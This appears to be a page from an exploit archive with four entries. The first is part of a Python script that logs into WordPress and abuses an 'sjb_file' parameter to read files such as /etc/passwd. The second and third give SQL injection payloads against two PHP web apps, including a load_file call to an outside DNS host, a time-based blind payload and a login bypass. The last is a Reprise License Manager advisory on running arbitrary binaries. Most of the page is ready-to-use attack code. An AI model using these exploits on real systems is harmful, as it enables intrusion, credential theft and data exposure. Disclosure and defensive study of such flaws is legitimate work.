Usage : ./wp-exploit.py <target_url> <file_path> <USER> <PASS>")<br /> print("[~] Example : ./wp-exploit.py http://target.com:8080/wordpress/ /etc/passwd admin admin")<br /> exit()<br /><br />else:<br /> banner()<br /> fetch_path = sys.argv[2]<br /> print (color_random[5]+"[+] Trying to fetch the contents from "+fetch_path)<br /> time.sleep(3)<br /> target_url = sys.argv[1]<br /> usernamex = sys.argv[3]<br /> passwordx = sys.argv[4]<br /> print("\n")<br /> login = target_url+"wp-login.php"<br /> wp_path = target_url+'wp-admin/post.php?post=application_id&action=edit&sjb_file='+fetch_path<br /> username = usernamex<br /> password = passwordx<br /><br /> with requests.Session() as s:<br /> headers = { 'Cookie':'wordpress_test_cookie=WP Cookie check',<br /> 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' }<br /><br /> post_data={ 'log':username, 'pwd':password, <br /> 'wp-submit':'Log In','redirect_to':wp_path, <br /> 'testcookie':'1'<br /> } <br /> <br /> s.post(login, headers=headers, data=post_data)<br /> resp = s.get(wp_path)<br /> <br /> out_file = open("output.txt", "w")<br /> print(resp.text, file=out_file)<br /> out_file.close()<br /> print(color_random[4]+resp.text)<br /> out = color_random[5]+"\n[+] Output Saved as: output.txt\n"<br /> print(out)<br /> <br /></code></pre>
<pre><code>## [MSMS](https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html)<br /><br />## [Vendor](https://www.sourcecodester.com/users/tips23)<br /><br />![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/MSMS/docs/Screenshot%202021-12-04%20175708.png)<br /><br />## Description<br />The `password` parameter of MSMS 1.0 appears to be vulnerable to SQL<br />injection. The predictive tests against this application interacted<br />with the domain shown in the payload, indicating that the injected SQL query was executed.<br />An attacker can retrieve all authentication data and<br />information about the users of this system.<br /><br />## Payload<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=hacked' AND (SELECT 5469 FROM<br />(SELECT(SLEEP(5)))kYFm) AND 'eRWi'='eRWi&password=y3L!z9j!P2'+(select<br />load_file('\\\\525cg9hmf4ujg32elolcrk29s0yumlq9hc54svgk.nu11secur1typenetrationtestingengineer.net\\maq'))+'<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/MSMS)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/fvwqq2)<br /></code></pre>
<pre><code># Exploit Title: Hotel Reservation System 1.0 - SQLi (Unauthenticated)<br /># Google Dork: None<br /># Date: 01/29/2022<br /># Exploit Author: Nefrit ID<br /># Author Website: https://manadocoder.com<br /># Vendor Homepage: https://github.com/dhruvmullick<br /># Software Link: https://github.com/dhruvmullick/hotel-reservation-system<br /># Tested on: Kali Linux & Windows 10<br /><br />===Exploit Url===<br />http://localhost/hotel-reservation-system-master/login.php<br />Method: POST<br />Parameter: username<br />===Burpsuite Proxy Intercept===<br />POST /hotel-reservation-system-master/loginsession.php HTTP/1.1<br />Host: localhost<br />Content-Length: 46<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://localhost/hotel-reservation-system-master/login.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: uid=1<br />Connection: close<br /><br />username=u1337#' AND (SELECT 4775 FROM (SELECT(SLEEP(5)))BzJL)-- dvSZ&password=p1337&ok=Submit<br />I can also bypass login by using the following payload: ' or '1'='1'# on the parameter username<br /><br /></code></pre>
<pre><code># Product: Reprise License Manager 14.2<br /># Vendor: Reprise Software<br /># CVE ID: CVE-2021-44153<br /># Vulnerability Title: Authenticated Remote Binary Execution<br /># Severity: High<br /># Author(s): Mark Staal Steenberg, Bilal El Ghoul, Gionathan Armando Reale, Andreas Fyhn Andersen, Oliver Lind Nordestgaard <br /># Date: 2021-11-25<br />#############################################################<br /><br />Introduction:<br /><br />When editing the license file, it is possible for an admin user to enable an option to run arbitrary executables.<br />An attacker can exploit this to run a malicious binary on startup, or when triggering the "Reread/Restart Servers" function on the webserver. (Exploitation does not require CVE-2018-15573, because the license file is meant to be changed in the application.)<br /><br />Vulnerability:<br /><br />As an example of this vulnerability, a license file containing the following line would execute calc.exe; it is also possible to pass arguments to the executable:<br /><br />ISV demo "C:\Windows\System32\calc.exe"<br /><br />If CVE-2018-15573 remains unpatched, files could be created on the system and then executed.<br /><br />Recommendation:<br />Don't allow user-specified binaries to be run. Use an allow-list if absolutely required.<br /><br /></code></pre>